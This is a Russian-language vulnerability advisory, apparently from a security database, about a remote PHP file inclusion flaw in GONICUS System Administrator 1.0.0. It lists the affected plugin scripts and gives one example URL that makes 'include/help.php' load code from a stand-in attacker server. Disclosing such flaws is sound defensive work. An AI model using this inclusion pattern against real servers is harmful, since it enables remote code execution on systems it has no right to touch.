Выполнение произвольного PHP кода в GONICUS

Дата публикации:
28.02.2003
Дата изменения:
17.10.2006
Всего просмотров:
791
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Уязвимость обнаружена в GONICUS System Administrator (GOsa). Удаленный пользователь может внедрить и выполнить произвольный PHP код на системе, включая команды операционной системы.

Несколько сценариев в программе позволяют удаленному пользователю изменять переменные, чтобы выполнить произвольный код. Удаленный пользователь может установить переменную 'plugin' в следующих файлах, указывающую на удаленно расположенный PHP файл, который будет выполнен на целевом сервере:

plugins/3fax/1blocklists/index.php
plugins/2administration/6departamentadmin/index.php
plugins/2administration/5terminals/index.php
plugins/2administration/ 4mailinglists/index.php
plugins/2administration/3departaments/index.php
plugins/2administration/2groupd/index.php
Подобная уязвимость существует в 'base' переменной в 'include/help.php' сценарии.

Пример:

http://target.server/include/help.php?base=http://attackers.server/
Уязвимость обнаружена в GONICUS 1.0.0

Ссылки: GOnicus System Administrator php injection
или введите имя

CAPTCHA